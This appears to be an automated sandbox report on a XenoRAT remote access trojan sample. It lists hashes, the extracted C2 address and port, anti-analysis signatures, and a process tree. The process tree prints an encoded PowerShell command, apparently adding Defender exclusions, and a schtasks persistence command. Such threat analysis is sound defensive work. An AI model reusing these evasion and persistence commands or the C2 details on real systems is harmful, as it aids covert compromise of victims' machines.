Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2024 09:54

General

  • Target

    363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe

  • Size

    31.0MB

  • MD5

    8f83513e7e3638b5a61c5e7f40f51c7e

  • SHA1

    e181ecf02f5575849e64f267fa733a83630191ee

  • SHA256

    363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d

  • SHA512

    c26ae71b83354a2a9fad7e5f12e6cd7de20defd455fd56cbaadc51e65a91ab506c0b98525244f6b4db25eb4586bef49f4dbb1f3e59c54312721da52c9974f091

  • SSDEEP

    786432:FjWc2f/LEmPTH4ccIAcuQ64skTX3KchPau56pIUWCkGm:xWpT9PcZ864s6HKchPipIUWC9m

Malware Config

Extracted

Family

xenorat

C2

96.126.118.61

Mutex

lokai_je_bruh_1337

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4444

  • startup_name

    Usermode Disk Driver Host

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Xenorat family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Themida packer 14 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe
    "C:\Users\Admin\AppData\Local\Temp\363108d651fdaa2b799b73018a910f9c55fbbb7025761eabb37a673d5650542d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcgBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZwBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZgBzACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2088
    • C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe
      "C:\Users\Admin\AppData\Local\Temp\Minecraft Checker.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2028
    • C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
      "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Users\Admin\AppData\Local\Temp\onefile_2708_133779524842932000\obfs.exe
        "C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2664
    • C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe
      "C:\Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks.exe" /Create /TN "Usermode Disk Driver Host" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD910.tmp" /F
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1744

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Colorful.Console.dll

    Filesize

    88KB

    MD5

    5f3d2cfbc21591b8feef1efa3e59a4d0

    SHA1

    15d1ad963a13b6c8ae28c26e7dc1cc3da2bc3bb8

    SHA256

    f31d4fd7e729fc6cf4ecab972b6b1ee897918a325b1ca572030966f831e768fb

    SHA512

    05135188c3b75cf642e4e1e833d01c24d2ce2c2b1ae71b0edf048e453a4716226d7af582365d2f6ab803b4b0fe83ce67d4c39125963fc50d597c30e56ae74a2f

  • C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

    Filesize

    22.7MB

    MD5

    d2eb38546ead92ea1bbdf931b5457dc7

    SHA1

    95c9b5cca9f1e85d294a87ba46fc08536c7aac11

    SHA256

    1eb1fb740cfd035b84f71b76c4e76e805ac92bf7f7d75a80516754ead7d13779

    SHA512

    bf0364031430303977d8f8ef88c1601488bb6fc6d450602b48b6302f5bc5fa7736dee291c0be4039a144f3efca6eb5ee531d58ea85c97104afbd2bef21f4f10d

  • C:\Users\Admin\AppData\Local\Temp\onefile_2708_133779524842932000\obfs.exe

    Filesize

    49.5MB

    MD5

    0ee419c3f7cb101a20ecc1f8b54aa8e4

    SHA1

    586608ab5158b4884e3f4bb9eaf7eea06e03d88d

    SHA256

    d878768d7cd3b23f7b0ad894f83468ef733485156527d6025de7f0a7bd5b8dd9

    SHA512

    8f1de1bece9d82bdd962ce652b154eab38511f66db0378715696d476cb3e19134556a619111380a7ccdd9f26e264990ce558963370e5862d8a863b7e47d3b3b2

  • C:\Users\Admin\AppData\Local\Temp\onefile_2708_133779524842932000\python312.dll

    Filesize

    6.6MB

    MD5

    3c388ce47c0d9117d2a50b3fa5ac981d

    SHA1

    038484ff7460d03d1d36c23f0de4874cbaea2c48

    SHA256

    c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

    SHA512

    e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

  • C:\Users\Admin\AppData\Local\Temp\tmpD910.tmp

    Filesize

    1KB

    MD5

    01cde87a13a2057c187112a061bbd391

    SHA1

    9c5d19bfc123338f87e9fe505cddd84af16a84fe

    SHA256

    87a351ec0d3e94019ceab47529dd5ac2d358d48207e0d64417725ee93b20724e

    SHA512

    d362a60a3be7c094475fef66429bf55c2c5f92bf87c0907404e9d84848db10ea7d880d2f1ca44d761683fc1546c9055e970a836593e81cc1b0aba92bb12e7f5e

  • \Users\Admin\AppData\Local\Temp\Minecraft Checker.exe

    Filesize

    224KB

    MD5

    5c7ff82a6ceacf1097fd5e68295936b4

    SHA1

    819def26e7c71097ab8f43db27169df23f5c610e

    SHA256

    36765099232cc72c5356b0173d7c41bd7a8153694ef6bcdf9d993c780acf6e1c

    SHA512

    4ca351d412bc0c8549412a0fe9da384f9dcceea9a794a89a9455653f0ff82b07368a133884e047e9cbbeb6a74ee800c16e53d4fbcf1dfab766b059dcb9b12767

  • \Users\Admin\AppData\Local\Temp\Usermode Disk Driver Host.exe

    Filesize

    4.6MB

    MD5

    0e40887991676af440b16986101b7c32

    SHA1

    c3b0f19d397ef2c33526d9fa9210ec2aa6ead71b

    SHA256

    047ac5b67b90cc8c180d87ca92b5e0d975abaf6ef085f8606fc176ae814fee7c

    SHA512

    fccadf83b087df14b6679d373b7de77fa30ce7f25aadb01f2d5f4365be9d459897169f06b43acd3f610009f57671b34ca2d15066b79c31985558fe4709bc59e2

  • memory/2028-32-0x0000000000210000-0x000000000022C000-memory.dmp

    Filesize

    112KB

  • memory/2028-15-0x00000000002D0000-0x000000000030E000-memory.dmp

    Filesize

    248KB

  • memory/2348-1-0x0000000077190000-0x0000000077192000-memory.dmp

    Filesize

    8KB

  • memory/2348-0-0x0000000000400000-0x0000000002758000-memory.dmp

    Filesize

    35.3MB

  • memory/2348-27-0x0000000000400000-0x0000000002758000-memory.dmp

    Filesize

    35.3MB

  • memory/2348-34-0x0000000000400000-0x0000000002758000-memory.dmp

    Filesize

    35.3MB

  • memory/2348-3-0x0000000000400000-0x0000000002758000-memory.dmp

    Filesize

    35.3MB

  • memory/2348-2-0x0000000000400000-0x0000000002758000-memory.dmp

    Filesize

    35.3MB

  • memory/2708-41-0x000000013F570000-0x0000000141044000-memory.dmp

    Filesize

    26.8MB

  • memory/2708-42-0x000000013F570000-0x0000000141044000-memory.dmp

    Filesize

    26.8MB

  • memory/2708-40-0x000000013F570000-0x0000000141044000-memory.dmp

    Filesize

    26.8MB

  • memory/2708-115-0x000000013F570000-0x0000000141044000-memory.dmp

    Filesize

    26.8MB

  • memory/2708-122-0x000000013F570000-0x0000000141044000-memory.dmp

    Filesize

    26.8MB

  • memory/2820-33-0x0000000000050000-0x0000000000C08000-memory.dmp

    Filesize

    11.7MB

  • memory/2820-39-0x0000000000050000-0x0000000000C08000-memory.dmp

    Filesize

    11.7MB

  • memory/2820-38-0x0000000000050000-0x0000000000C08000-memory.dmp

    Filesize

    11.7MB

  • memory/2820-117-0x0000000000050000-0x0000000000C08000-memory.dmp

    Filesize

    11.7MB